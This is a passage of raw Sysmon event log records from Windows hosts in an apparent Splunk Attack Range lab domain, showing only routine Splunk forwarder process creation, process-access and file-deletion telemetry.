09:22:32.999{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=134480E748D5D134837D0066B3691A8A,SHA256=6EFF0D4AD343439A61B13DBE92ABF2AF7DDEFABC6E5FF2744C2DBA7D8794BA45,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056296Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:34.438{5EBD8912-8D5A-6151-A800-00000000FD01}56805684C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056295Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:34.312{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=49F4D3D6CA70568FDE38B50132733493,SHA256=9381C16C2A5388E1D88F4D83075AB6D4537B41D48B70EE694657F230FD5AF228,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056294Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:34.219{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D5A-6151-A800-00000000FD01}5680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056293Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:34.219{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056292Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:34.219{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056291Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:34.219{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056290Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:34.219{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D5A-6151-A800-00000000FD01}5680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056289Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:34.219{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056288Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:34.219{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D5A-6151-A800-00000000FD01}5680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056287Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:34.220{5EBD8912-8D5A-6151-A800-00000000FD01}5680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056286Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:34.049{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30B043609682B493D7086217CE0D2B19,SHA256=7C45A8E4A2F30CF6A77375E99343E64195DBB83069C04258BB3C5BDEACFC3A99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981058Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:35.106{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA4955AF9A9230EFFDD3CCA37D7EE1E5,SHA256=832E839F16C7946CCA8876349F56CAD2F91D53D03DAB278C3F57C49ECFF5110D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056307Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:35.906{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14DA866952E4940F5663E5C552C0B03A,SHA256=9F0836F1640D2A2868D789C0FBD221E15215FEA6E65D9CA2DA04E0DB3547BE09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056306Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:35.328{5EBD8912-8D5A-6151-A900-00000000FD01}3725128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056305Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:35.109{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56A74C8842E3A9FB984A2CAC7979D9F4,SHA256=3C1AEBDE40E06CC676F388EC523826666986BB5657F4D6785ADE1398B83F5EA8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056304Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:35.031{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D5A-6151-A900-00000000FD01}372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056303Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:35.031{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056302Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:35.031{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056301Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:35.031{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056300Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:35.031{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056299Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:35.031{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D5A-6151-A900-00000000FD01}372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056298Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:35.031{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D5A-6151-A900-00000000FD01}372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056297Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:34.891{5EBD8912-8D5A-6151-A900-00000000FD01}372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981059Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:36.341{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0813C1AF1B97978B5EDD6F1916FACFFD,SHA256=03BB767B6F0A8C8330A639BDC2D4949844E5EEC1B1D85CC85BA2156583866ED2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056316Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:36.703{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D5C-6151-AA00-00000000FD01}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056315Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:36.703{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056314Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:36.703{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056313Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:36.703{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056312Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:36.703{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056311Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:36.703{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D5C-6151-AA00-00000000FD01}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056310Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:36.703{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D5C-6151-AA00-00000000FD01}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program 